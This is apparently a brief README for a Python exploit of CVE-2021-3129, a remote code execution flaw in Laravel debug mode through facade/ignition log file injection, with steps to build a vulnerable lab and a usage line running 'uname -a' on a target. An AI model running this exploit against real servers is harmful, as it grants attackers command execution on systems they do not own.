
Exploit Python pour l'exécution de code à distance en mode débogage de Laravel <=8.4.2 (CVE-2021-3129) utilisant une injection de fichier journal forgée via facade/ignition.
git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
php artisan serve
python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log 'uname -a'
